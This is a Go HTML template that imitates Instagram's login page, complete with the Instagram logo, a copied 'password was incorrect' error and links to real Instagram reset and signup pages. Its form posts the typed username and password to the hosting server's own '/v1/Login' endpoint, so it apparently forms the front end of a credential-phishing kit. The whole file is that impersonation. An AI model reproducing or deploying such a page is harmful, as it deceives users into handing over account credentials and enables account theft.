{{template "base" .}}

{{define "content"}}
 <div class="container">
    <div class="page">
        <div class="logo">
            <img src="../static/images/instagram.png" alt="instagram" style="width: 175px;">
        </div>
        <br />
        <form class="container" action="/v1/Login" method="post">
            <input type="text" placeholder="Phone number, username, or email" name="u_name">
            <input type="password" placeholder="Password" name="pass">
            <button class="submitbutton">Log in</button>
            {{if .InvalidUsername}}
            <div class="_ab2z">Sorry, your password was incorrect. Please double-check your password.</div>
            {{end}}
            <br />
            <div class="option">OR</div>
        </form>
        <div class="fblink">
            <span class="fab facebook"></span>
            <a href="https://www.facebook.com">Log in With Facebook</a>
        </div>
        <div class="forget-id">
            <a href="https://www.instagram.com/accounts/password/reset/">Forget password?</a>
        </div>
        <div class="singup">
            <p>Don't have an account?<a href="https://www.instagram.com/accounts/emailsignup/">Sign up</a></p>
        </div>
    </div>
</div>
 <br />
 <div style="position:fixed;left:0;bottom:0;width:100%;color: #7e7979;"></div>
 <br/>
{{end}}
